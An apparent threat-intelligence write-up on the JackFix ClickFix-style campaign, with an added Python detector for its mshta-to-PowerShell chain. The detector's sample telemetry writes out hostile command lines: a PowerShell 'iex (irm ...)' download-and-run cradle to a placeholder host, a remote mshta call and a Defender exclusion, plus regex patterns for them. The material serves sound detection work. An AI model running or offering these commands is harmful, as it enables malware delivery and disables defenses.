
JackFix Malware Campaign

A recent investigation highlights a growing wave of attacks exploiting ClickFix‑style social engineering. These schemes rely on convincing victims to execute harmful commands themselves, often through staged technical prompts. The latest operation takes this tactic further by pairing it with fake adult websites and counterfeit Windows update notices, forming a highly manipulative infection chain security teams have dubbed JackFix.

Adult‑Themed Phishing Portals as the Entry Point

The campaign begins with fraudulent adult sites crafted to resemble well‑known platforms, delivered through malvertising and other redirect techniques. When users land on these pages, they are swiftly confronted with an urgent update message framed as a critical Windows security notification. The adult theme amplifies the psychological pressure, making the sudden update prompt seem plausible and discouraging users from questioning its authenticity.

Some variants of these sites contain developer remarks in Russian, suggesting a possible connection to a Russian‑speaking threat group.

Deceptive Full‑Screen Update Alerts

Once a visitor interacts with the rogue page, HTML and JavaScript components instantly launch a full‑screen imitation of a Windows update dialog. The interface uses a blue background and simple white text, echoing the style of high‑urgency system messages. JavaScript attempts to force full‑screen mode, while additional code tries to block common escape keys, including Escape, F11, F5, and F12, to trap the user within the fake update. Despite this, implementation errors allow Escape and F11 to still function, giving users a possible way out.

The crux of the deception lies in the instructions displayed to the victim: open the Windows Run dialog, paste a pre‑copied command, and execute it. Following these steps launches the malicious payload and initiates the compromise.

ClickFix Dominance and the Evolution of the Attack

ClickFix‑style activity has sharply increased, now representing nearly half of documented initial access events. Traditionally, such threats impersonate CAPTCHA checks or troubleshooting prompts. The JackFix campaign marks a shift toward more immersive and system‑like lures, showing how attackers continually refine psychological manipulation to achieve user‑assisted code execution.

Layered Obfuscation and Command‑Triggered Payload Delivery

The first command executed on the victim’s machine leverages mshta.exe to run an MSHTA payload containing JavaScript. This script calls a PowerShell command that retrieves another PowerShell stage from a remote server. To evade scrutiny, the associated domains redirect to harmless sites like Google or Steam when accessed manually. Only requests made via specific PowerShell commands, such as irm or iwr, trigger the malicious response, adding a significant analysis barrier.

The downloaded PowerShell script includes heavy obfuscation: junk code, hidden logic, and checks meant to hinder reverse engineering. It also attempts privilege escalation and adds antivirus exclusions tied to C2 endpoints and staging directories.

Forced Privilege Escalation and Payload Deployment

Privilege uplift is pursued using the Start‑Process cmdlet with the -Verb RunAs parameter, repeatedly prompting the victim until administrative rights are granted. Once elevated, the script deploys additional components, often lightweight remote access trojans designed to contact a C2 server and fetch further malware.
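The three stages just described (mshta.exe handing off to PowerShell, a PowerShell download cradle using the irm/iwr aliases of Invoke-RestMethod and Invoke-WebRequest, the repeated Start-Process -Verb RunAs elevation, and the antivirus exclusions) are each individually noisy but, seen together in one process lineage, make a strong detection signal. The Python below is an added example, not code from the original write-up or from any vendor tooling: it runs simple rules over constructed process-creation events in the style of Sysmon Event ID 1 and then scores each process by how many chain stages its ancestry touches. The domain names, paths and PIDs are invented placeholders, and the exclusion rule assumes the exclusions are added through Microsoft Defender's Add-MpPreference cmdlet, which the write-up does not name.

```python
"""Detection of a JackFix-style execution chain over constructed process events."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR style)."""
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


PS_IMAGES = ("powershell.exe", "pwsh.exe")
# irm / iwr are the built-in aliases of Invoke-RestMethod / Invoke-WebRequest.
DOWNLOAD_CRADLE = re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b.*https?://", re.I)
RUNAS = re.compile(r"Start-Process\b.*-Verb\s+RunAs", re.I)
# Assumption: the exclusions are added with Defender's Add-MpPreference cmdlet.
AV_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)

# One rule per chain stage, in the order the stages occur.
RULES = {
    "mshta_with_url": lambda e: _basename(e.image) == "mshta.exe"
    and re.search(r"https?://", e.cmdline, re.I) is not None,
    "mshta_spawns_powershell": lambda e: _basename(e.parent_image) == "mshta.exe"
    and _basename(e.image) in PS_IMAGES,
    "powershell_download_cradle": lambda e: _basename(e.image) in PS_IMAGES
    and DOWNLOAD_CRADLE.search(e.cmdline) is not None,
    "runas_elevation_prompt": lambda e: RUNAS.search(e.cmdline) is not None,
    "defender_exclusion_added": lambda e: AV_EXCLUSION.search(e.cmdline) is not None,
}

# Constructed sample telemetry (placeholder hosts/paths, not real IoCs).
# 1001-1004 model the chain; 2001/2002 are ordinary admin activity.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    ProcEvent(1001, 900, EXPLORER, MSHTA, r"mshta.exe https://update-check.invalid/stage1.hta"),
    ProcEvent(1002, 1001, MSHTA, PS,
              r'powershell.exe -w hidden -ep bypass -c "iex (irm https://update-check.invalid/s2)"'),
    ProcEvent(1003, 1002, PS, PS,
              r'powershell.exe -c "Start-Process powershell -Verb RunAs -ArgumentList \'-f C:\Users\Public\stage\s3.ps1\'"'),
    ProcEvent(1004, 1003, PS, PS,
              r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\Users\Public\stage"'),
    ProcEvent(2001, 900, EXPLORER, PS, r'powershell.exe -c "Get-ChildItem C:\Temp"'),
    ProcEvent(2002, 900, EXPLORER, PS,
              r'powershell.exe -c "Invoke-WebRequest https://vendor.example/tool.zip -OutFile C:\Temp\tool.zip"'),
]


def evaluate(events):
    """Map pid -> list of rule names that matched that single event."""
    hits = {}
    for e in events:
        matched = [name for name, pred in RULES.items() if pred(e)]
        if matched:
            hits[e.pid] = matched
    return hits


def lineage_scores(events):
    """Map pid -> number of distinct chain stages seen in the process and its ancestors.

    A lone download cradle (like 2002) scores 1 and is routine; a lineage that
    climbs through mshta, cradle, RunAs and AV exclusion scores 5.
    """
    by_pid = {e.pid: e for e in events}
    hits = evaluate(events)
    scores = {}
    for e in events:
        stages, cur, seen = set(), e, set()
        while cur is not None and cur.pid not in seen:
            seen.add(cur.pid)
            stages.update(hits.get(cur.pid, []))
            cur = by_pid.get(cur.ppid)  # None once we leave recorded telemetry
        scores[e.pid] = len(stages)
    return scores


if __name__ == "__main__":
    for pid, rules in evaluate(SAMPLE_EVENTS).items():
        print(pid, rules)
    print(lineage_scores(SAMPLE_EVENTS))
```

The per-lineage score is the point: each rule on its own will fire on legitimate administration, so alerting thresholds belong on the number of distinct stages in one ancestry chain rather than on any single event, and the mshta-to-PowerShell parent/child edge is the one relationship here that has almost no benign explanation.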

A Diverse Arsenal of Stealers and Loaders

The malware has been observed delivering up to eight distinct payloads, including:

  • Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey
  • Other loaders and RATs used to stage follow‑on threats

Only one successful execution is enough to jeopardize sensitive data. Victims face the loss of credentials, crypto holdings, and other personal information. Certain loaders also enable attackers to extend the intrusion with more potent malware, escalating the impact significantly.
